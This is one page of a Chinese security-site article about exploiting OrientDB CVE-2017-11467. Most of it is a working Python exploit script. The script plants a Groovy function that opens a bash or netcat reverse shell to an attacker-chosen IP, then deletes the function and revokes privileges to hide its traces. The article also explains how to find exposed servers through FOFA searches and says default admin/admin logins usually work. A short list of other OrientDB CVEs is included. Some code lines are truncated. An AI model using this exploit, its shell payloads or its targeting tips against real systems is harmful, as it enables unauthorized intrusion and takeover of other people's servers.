欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

OrientDB远程代码执行漏洞利用与分析

来源:本站整理 作者:佚名 时间:2017-08-26 TAG: 我要投稿
func_name = random_function_name()
print func_name
databases = enum_databases(target)
reverse_ip = raw_input('Enter the ip to connect back: ')
query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/'+reverse_ip+'/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file 
#query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081 >/tmp/f\' \u000a File file = new File(\"hello.sh\")\u000a file.delete() \u000a file
#query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"lllasd","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file
req = requests.post("http://%s:%s/document/%s/-1:-1"%(target,port,databases[0]),data=query,auth=('writer','writer'))
if req.status_code == 201:
#print req.status_code
#print req.json()
func_id = req.json()['@rid'].strip("#")
#print func_id
print "[+] Exploitation successful, get ready for your shell.Executing %s"%(func_name)
req = requests.post("http://%s:%s/function/%s/%s"%(target,port,databases[0],func_name),auth=('writer','writer'))
#print req.status_code
#print req.text
if req.status_code == 200:
print "[+] Open netcat at port 8081.."
else:
print "[+] Exploitation failed at last step, try running the script again."
print req.status_code
print req.text
#print "[+] Deleting traces.."
req = requests.delete("http://%s:%s/document/%s/%s"%(target,port,databases[0],func_id),auth=('writer','writer'))
priv1 = run_queries("REVOKE","database.class.ouser","Cleaning Up..database.class.ouser")
priv2 = run_queries("REVOKE","database.function","Cleaning Up..database.function")
priv3 = run_queries("REVOKE","database.systemclusters","Cleaning Up..database.systemclusters")
#print req.status_code
#print req.text
def main():
target = sys.argv[1]
#port = sys.argv[1] if sys.argv[1] else 2480
try:
port = sys.argv[2] if sys.argv[2] else 2480
#print port
except:
port = 2480
if priv_escalation(target,port):
exploit(target,port)
else:
print "[+] Target not vulnerable"
main()
0×04 漏洞回顾
CVE-2017-11467(高危)
OrientDB通过2.2.22在“where”或“fetchplan”或“order by”使用期间不执行特权要求,允许远程攻击者通过精心制作的请求执行任意操作系统命令
CVE-2015-2918
在2.0.1之前的2.0.15和2.1.x之前的OrientDB Server Community Edition中的Studio组件没有适当地限制使用FRAME元素,这使远程攻击者更容易通过精心设计的网站进行劫持攻击。
CVE-2015-2913
server/network/protocol/http/OHttpSessionManager.java在OrientDB Server社区版的Studio组件2.0.15、2.1.x和2.1.1之前版本不正确地依赖于java.util.Random类来生成随机Session ID值,这使远程攻击者更容易通过确定此类中的PRNG的内部状态来预测值
CVE-2015-2912
在2.0.1之前的2.0.15和2.1.x之前的OrientDB Server Community Edition的Studio组件中的JSONP端点没有适当地限制回调值,这允许远程攻击者通过精心设计的HTTP请求进行跨站点请求伪造(CSRF)攻击,并获得敏感信息。
0×05.实战CVE-2017-11467漏洞利用
1.安装poc.py所需的组件
直接执行python CVE-2017-11467.py 127.0.0.1后,出现错误,如图2所示,则表示需要requests组件的支持,可以下载requests-2.18.4.tar.gz,可参考下载地址
解压requests-2.18.4.tar.gz文件后,使用python setup.py install进行安装。

2.寻找OrientDB
zoomeye目前在升级,因此用https://fofa.sol来进行搜索效果比较佳,关键词“orientdb && port=2480”,对于2.2.X版本基本是通杀。获取结果后,通过单击链接来查看可否正常访问。能够正常访问,登录密码一般都是admin/admin。
3.执行命令
(1)检测是否存在漏洞
例如python CVE-2017-11467.py 127.0.0.1后其结果:
C:\Python27>python CVE-2017-11467.py 127.0.0.1
[+] Checking OrientDB Database version is greater than 2.2
[+] Privilege Escalation done checking enabling operations on database.function

上一页  [1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载